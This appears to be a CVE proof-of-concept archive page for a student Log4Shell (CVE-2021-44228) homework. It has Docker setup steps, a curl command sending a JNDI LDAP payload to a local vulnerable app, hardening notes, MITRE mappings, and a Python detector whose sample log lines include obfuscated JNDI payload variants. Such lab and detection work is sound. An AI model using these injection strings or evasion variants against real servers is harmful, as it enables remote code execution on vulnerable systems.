
CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Source
Associated Vulnerability
Title: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
Log4Shell (CVE-2021-44228) exploit demo for SEAS 8405. Includes a vulnerable Spring Boot app, fake LDAP server, Docker setup, MITRE mapping, incident response, and a full screen recording.
Readme
# Homework 9 – Securing Systems Against Log4Shell Exploits

## Overview

This project demonstrates the exploitation and mitigation of the Log4Shell vulnerability (CVE-2021-44228) using a Dockerized Java web application with vulnerable Log4j 2.14.1. The setup also includes a simulated malicious LDAP server to demonstrate the JNDI injection attack path.

After exploitation, the system is hardened by upgrading Log4j, validating input, and applying MITRE D3FEND and ATT&CK recommendations.

---

## Folder Structure

```
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf
```

---

## How to Run

### 1. Build the Java App (with vulnerable Log4j)

```bash
docker build -t vulnerable-app .
```

### 2. Run the App with Docker Compose

```bash
docker-compose up
```

The app will be running at:  
http://localhost:8080

### 3. Start the Fake LDAP Server (in a new terminal)

```bash
python3 ldap_server.py
```

### 4. Simulate an Exploit

Send a request like this to the app:

```bash
# Single quotes keep the shell from expanding ${...} before curl sends it
curl 'http://localhost:8080/?input=${jndi:ldap://localhost:8000/Exploit}'
```

The LDAP server should receive the request (this simulates the JNDI exploit).

---

## How It’s Hardened

After demonstrating the attack, the system was secured by:

- Upgrading Log4j to version 2.17.0
- Input validation (blocking `${jndi:...}` patterns)
- Disabling message lookups in configuration
- Docker isolation to limit scope
- MITRE D3FEND & ATT&CK techniques applied
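A plain substring block on `${jndi:` is a weak version of the input-validation step above, because Log4j resolves nested lookups such as `${lower:j}` before the JNDI lookup runs, so a validator or log scanner should fold those lookups first. The following Python is an added example, not the project's code: the regexes are an assumed reading of the documented `${lower:x}`, `${upper:x}` and `${prefix:key:-default}` lookup forms, the access-log lines are constructed, and the Log4j upgrade remains the real fix.

```python
import re

# Lookups that resolve to a literal and can hide the "jndi:" keyword from a
# plain substring check. Each is folded to the text Log4j would substitute
# before the check runs. The regexes are this example's reading of the
# documented ${lower:x}, ${upper:x} and ${prefix:key:-default} forms.
_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*?:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _fold_case(m: re.Match) -> str:
    return m.group(2).lower() if m.group(1).lower() == "lower" else m.group(2).upper()


def normalize_lookups(text: str, max_rounds: int = 10) -> str:
    """Collapse nested case/default lookups from the inside out."""
    for _ in range(max_rounds):
        folded = _DEFAULT.sub(lambda m: m.group(1), _CASE.sub(_fold_case, text))
        if folded == text:
            break
        text = folded
    return text


def contains_jndi_lookup(value: str) -> bool:
    """True if the value would reach Log4j's JNDI lookup after substitution."""
    return _JNDI.search(normalize_lookups(value)) is not None


def scan_log_lines(lines: list[str]) -> list[tuple[int, str]]:
    """Return (1-based line number, normalized line) for each suspicious line."""
    return [(n, normalize_lookups(line)) for n, line in enumerate(lines, start=1)
            if contains_jndi_lookup(line)]


# Constructed sample access-log lines (not taken from the project's recording).
SAMPLE_LOG = [
    '127.0.0.1 "GET /?input=hello HTTP/1.1" 200 "curl/7.88"',
    '127.0.0.1 "GET /?input=${jndi:ldap://localhost:8000/Exploit} HTTP/1.1" 200 "curl/7.88"',
    '127.0.0.1 "GET / HTTP/1.1" 200 "${${lower:j}${upper:n}di:ldap://localhost:8000/a}"',
    '127.0.0.1 "GET / HTTP/1.1" 200 "${${::-j}${env:NOPE:-n}di:ldap://localhost:8000/a}"',
    '127.0.0.1 "GET /?input=${date:yyyy-MM-dd} HTTP/1.1" 200 "curl/7.88"',
]

if __name__ == "__main__":
    for n, norm in scan_log_lines(SAMPLE_LOG):
        print(f"line {n}: {norm}")
```

Lines 2, 3 and 4 of the sample are flagged; the benign `${date:...}` lookup on line 5 is not, which a raw `${` block would have rejected.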

---

## MITRE Mapping

### MITRE ATT&CK:
- T1190: Exploit Public-Facing Application
- T1210: Exploitation of Remote Services

### MITRE D3FEND:
- D3-IA: Input Validation
- D3-HI: Host-based Intrusion Detection
- D3-DA: Disable Unsafe Features

---

## Report

See `mitigation_report.pdf` for:
- System architecture before/after
- Explanation of Log4Shell
- Mitigation strategy
- Incident response plan

---

## Screen Recording

If the video is not uploaded directly, it is available at the link in the report.

---

## Author

**Serpil Rivas**  
SEAS 8405 – Cybersecurity Architectures  
May 2025
File Snapshot

```
[4.0K] /data/pocs/3f55c353215d113e70869425385dc2e9b3d45bc2
├── [1.3M] Architecture-Diagram.png
├── [ 135] docker-compose.yml
├── [ 244] Dockerfile
├── [ 613] ldap_server.py
├── [1.6K] pom.xml
├── [2.2K] README.md
├── [2.0M] Rivas_SEAS8405_Assignment_9_Report.pdf
├── [4.0K] Screenshots
│   ├── [114K] Screen1.png
│   ├── [147K] screen2.png
│   ├── [139K] screen3.png
│   └── [192K] Screen 4.png
├── [4.0K] src
│   └── [4.0K] main
│       └── [4.0K] java
│           └── [4.0K] com
│               └── [4.0K] example
│                   ├── [ 328] Log4ShellDemoApplication.java
│                   └── [ 567] LogController.java
└── [4.0K] target
    ├── [4.0K] classes
    │   └── [4.0K] com
    │       └── [4.0K] example
    │           ├── [ 750] Log4ShellDemoApplication.class
    │           └── [1.5K] LogController.class
    ├── [ 18M] log4shell-demo-0.0.1-SNAPSHOT.jar
    ├── [3.2K] log4shell-demo-0.0.1-SNAPSHOT.jar.original
    ├── [4.0K] maven-archiver
    │   └── [  69] pom.properties
    └── [4.0K] maven-status
        └── [4.0K] maven-compiler-plugin
            └── [4.0K] compile
                └── [4.0K] default-compile
                    ├── [  75] createdFiles.lst
                    └── [ 193] inputFiles.lst

15 directories, 20 files
```